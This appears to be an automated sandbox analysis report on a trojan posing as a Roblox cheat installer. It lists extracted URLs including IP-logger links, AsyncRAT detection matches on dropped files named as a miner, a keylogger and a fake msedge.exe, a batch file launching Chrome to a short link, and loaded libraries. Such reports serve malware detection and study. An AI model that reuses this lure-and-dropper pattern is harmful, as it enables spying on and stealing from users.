            Source: robloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate
            Source: robloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloadsr
            Source: chromecache_137.12.drString found in binary or memory: https://counter.yadro.ru/hit?
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbees
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/privacy/
            Source: chromecache_137.12.drString found in binary or memory: https://iplogger.org/rules/
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: https://s3.amazonaws.com/
            Source: robloxPX1instaler.exe.0.drString found in binary or memory: https://setup.rbxcdn.com
            Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.comw
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: unknown | HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49730 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49734 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.9:60764 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: BitCoin_miner.exe.3.dr, XLogger.cs | .Net Code: KeyboardLayout
            Source: msedge.exe.3.dr, XLogger.cs | .Net Code: KeyboardLayout

            System Summary

            Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF75454C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\ msedge.exe E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe 79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Keyloger.exe 8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
            Source: roblox cheat.exe, 00000000.00000000.1340236408.0000000000F24000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000002.1348520885.000000000153E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000000.1339003894.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000002.1349842521.00000000047C3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe | Binary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe | Binary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
            Source: roblox cheat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.3.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, tMXwX3tWlMuOZgJ.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal90.troj.spyw.evad.winEXE@32/23@18/13
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75454B6D8 GetLastError,FormatMessageW,LocalFree,3_2_00007FF75454B6D8
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754568624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00007FF754568624
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeFile created: C:\Program Files (x86)\RobloxJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\roblox cheat.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
            Source: C:\Users\user\Desktop\roblox cheat.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: roblox cheat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: roblox cheat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
            Source: C:\Users\user\Desktop\roblox cheat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: roblox cheat.exeReversingLabs: Detection: 60%
            Source: roblox cheat.exeString found in binary or memory: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\Installer\Windows\include\Installer/Installer.h
            Source: roblox cheat.exe | String found in binary or memory: tcontentcontent\avatarcontent\configscontent\fontscontent\skycontent\soundscontent\texturescontent\modelsExtraContentExtraContent\LuaPackagesExtraContent\translationsExtraContent\modelsExtraContent\texturesExtraContent\placesPlatformContentPlatformContent\pcPlatformContent\pc\texturesPlatformContent\pc\terrainPlatformContent\pc\fontsshaderssslWebView2RuntimeInstallerInstallerFailedToLaunchClientInstallerFailedToLaunchItself[FLog::DesktopInstaller] Downloading file {}Failed to download {}Empty response from {}Failed to compare {} to expected hash {} of {}. responseBody size: {}. http code: {}.failed Error from WinInet: {}Failed to overwrite {}[FLog::DesktopInstaller] unzipping file {}[FLog::DesktopInstaller] copying file {}failed to copy file {} to {}C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\Installer\Windows\src\Installer.cppAppPathAppName[FLog::DesktopInstaller] failed to read subkey {}[FLog::DesktopInstaller] found obsolete elevation policy registry of {} in folder {}Uncaught exception occurred. Code: {}[FLog::DesktopInstaller] Uncaught exception occurred[FLog::DesktopInstaller] Failed to recordStatus at milestone {} with error: {}successrecordStatus_{}isBackgroundModeInstallerRestartedFailed with exception {}Caught Windows error: {}Got null installer while initializing{}\Temp\Roblox\{}_{}Failed to create folder {}Failed to copy file from {} to {}failstartNewStatusFile[FLog::DesktopInstaller] Failed to start new status file with error: {}. 
Removing background mode arg{} {} {}[FLog::DesktopInstaller] Ready to relaunch: {}*"{}\{}\{}"Download startedDownload completed[FLog::DesktopInstaller] Download and install files{}-{}ErrorFile{}Error in running fileTasks{}\AppSettings.xmlfailed to write file: {}{}\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe[FLog::DesktopInstaller] Run webview2 installer {}[FLog::DesktopInstaller] Failed to run webview2 installer {} in user mode: waitResult={}, errCode={}, exitCode={}[FLog::DesktopInstaller] Rerun webview2 installer {} in admin mode[FLog::DesktopInstaller] Failed to run webview2 installer {} in admin mode: waitResult={}, errCode={}, exitCode={}[FLog::DesktopInstaller] No privilege to rerun webview2 installer {} in admin mode[FLog::DesktopInstaller] Create installation folders[FLog::DesktopInstaller] Create installation folder: {}[FLog::DesktopInstaller] Installation Item: {} to {}[FLog::DesktopInstaller] Register environment info{}\{}.exe"{}" -uninstallUninstallStringRoblox CorporationPublisherhttp://{}URLInfoAboutCommentsInstallLocationNoModifyNoRepair{},0DisplayIconDisplayName{:04d}-{:02d}-{:02d}InstallDate{}\CapabilitiesApplicationDescription"{}",0ApplicationIconApplicationName{}\UrlAssociationsbaseHostversionfailed to remove uninstall registryfailed to remove IE subEnviron registryfailed to remove class registryversion-*[FLog::DesktopInstaller] Remove installation target: {}[FLog::DesktopInstaller] Failed to remove old files in {}, you may need delete the folder manually.\Roblox{}\
            Source: roblox cheat.exe | String found in binary or memory: Miscellaneous-Installation-of-desktop-items
            Source: roblox cheat.exe | String found in binary or memory: Miscellaneous-Launching-programs-and-files-in-an-IFRAME
            Source: roblox cheat.exe | String found in binary or memory: Miscellaneous-Launching-applications-and-unsafe-files
            Source: roblox cheat.exe | String found in binary or memory: Miscellaneous-Allow-websites-to-open-windows-without-address-or-status-bars
            Source: roblox cheat.exe | String found in binary or memory: Automatically logon with current username and passwordPrompt for user name and passwordAutomatic logon only in the Intranet zoneAnonymous logonDisableHigh SafetyEnablePromptAdministrator approvedNotReachableWifiWiredActiveX-controls-and-plug-ins-Download-signed-ActiveX-controls1001ActiveX-controls-and-plug-ins-Download-unsigned-ActiveX-controls1004ActiveX-controls-and-plug-ins-Run-ActiveX-controls-and-plug-ins1200ActiveX-controls-and-plug-ins-Initialize-and-script-ActiveX-controls-not-marked-as-safe-for-scripting1201Miscellaneous-Allow-scripting-of-Internet-Explorer-Web-browser-control1206ActiveX-controls-and-plug-ins-Allow-previously-unused-ActiveX-controls-to-run-without-prompt1208ActiveX-controls-and-plug-ins-Allow-Scriptlets1209ActiveX-controls-and-plug-ins-ActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrictions120AActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrict-ions120BScripting-Active-scripting1400Scripting-Scripting-of-Java-applets1402ActiveX-controls-and-plug-ins-Script-ActiveX-controls-marked-as-safe-for-scripting1405Miscellaneous-Access-data-sources-across-domains1406Scripting-Allow-Programmatic-clipboard-access1407Scripting-Enable-XSS-Filter1409Miscellaneous-Submit-non-encrypted-form-data1601Downloads-Font-download1604Run-Java1605Miscellaneous-Userdata-persistence1606Miscellaneous-Navigate-sub-frames-across-different-domains1607Miscellaneous-Allow-META-REFRESH1608Miscellaneous-Display-mixed-content1609Miscellaneous-Include-local-directory-path-when-uploading-files-to-a-server160AMiscellaneous-Installation-of-desktop-items1800Miscellaneous-Drag-and-drop-or-copy-and-paste-files1802Downloads-File-Download1803Miscellaneous-Launching-programs-and-files-in-an-IFRAME1804Launching-programs-and-files-in-webview1805Miscellaneous-Launching-applications-and-unsafe-files1806Miscellaneous-Use-Pop-up-Blocker1809Allow-OpenSearch-queries-in-Windows
-Explorer180EAllow-previewing-and-custom-thumbnails-of-OpenSearch-query-results-in-Windows-Explorer180FUser-Authentication-Logon1A00Allow-persistent-cookies-that-are-stored-on-your-computer1A02Allow-per-session-cookies-not-stored1A03Miscellaneous-Dont-prompt-for-client-certificate-selection-when-no-certificates-or-only-one-certificate-exists1A04Allow-3rd-party-persistent-cookies1A05Allow-3rd-party-session-cookies1A06Miscellaneous-Software-channel-permissions1E05ActiveX-controls-and-plug-ins-Binary-and-script-behaviors2000DotNET-Framework-reliant-components-Run-components-signed-with-Authenticode2001DotNET-Framework-reliant-components-Run-components-not-signed-with-Authenticode2004DotNET-Framework-Reliant-Components-Permissions-for-Components-with-Manifests2007Miscellaneous-Open-files-based-on-content-not-file-extension2100Miscellaneous-Web-sites-in-less-privileged-web-content-zone-can-navigate-into-this-zone2101Miscellaneous-Allow-script-initiated-windows-without-size-or-position-constraints2102Scripting-Allow-status-bar-updates-via-script2103Miscellaneo
            Source: roblox cheat.exe | String found in binary or memory: ShowFlashMessage('Worst: ' + (end-start).toFixed(2) + 'ms ' + TimerInfo[Token].name, 100);
            Source: roblox cheat.exe | String found in binary or memory: EnabledByDefaultEnabledSetByGroupPolicyDisabledSetByGroupPolicyEnabledSetByDefaultPolicyDisabledSetByDefaultPolicySOFTWARE\Policies\Microsoft\EdgeUpdateWebView2 Runtime Not InstalledInstallWebView2RuntimeTimeoutMsUpdate{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}Install{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}InstallDefault108.0.1462.37C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\WebView2Runtime.cppMicrosoftEdgeWebview2Setup.exe /silent /installFailed to create %sFailed to wait %sFailed to get exit processExitCode %s%s exited with failure processExitCode: %u/silent /installrunasFailed to admin execute %sFailed to admin wait %sFailed to admin get exit processExitCode %sSetDefaultDllDirectoriesC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DLLHelpers.cppfailed to load message resource %uC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\LocalizedText.cppfailed to lock resource %ufailed to find message resource %ufailed to find RCDATA resource %ufailed to get size of resource %uNULL argumentC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DirectXVersion.cppD3D11CreateDeviced3d11.dllFailed to load function D3D11CreateDeviceFailed to create directX device
            Source: roblox cheat.exe | String found in binary or memory: iphlpapi.dllif_nametoindexws2_32FreeAddrInfoExWGetAddrInfoExCancelGetAddrInfoExWLoadLibraryExA\/AddDllDirectoryh1h2h3%10s %512s %u %10s %512s %u "%64[^"]" %u %urt%s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %d
            Source: roblox cheat.exe | String found in binary or memory: set-addPolicy
            Source: roblox cheat.exe | String found in binary or memory: id-cmc-addExtensions
            Source: unknown | Process created: C:\Users\user\Desktop\roblox cheat.exe "C:\Users\user\Desktop\roblox cheat.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exe | Process created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exe | Process created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1928,i,13588240422126798521,8416605528282741341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: dlnashext.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe | Section loaded: wpdshext.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: powrprof.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: umpdc.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: d3d11.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: dxgi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: resourcepolicyclient.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: d3d10warp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: napinsp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: pnrpnsp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: wshbth.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: nlaapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Section loaded: winrnr.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Section loaded: windows.storage.dll
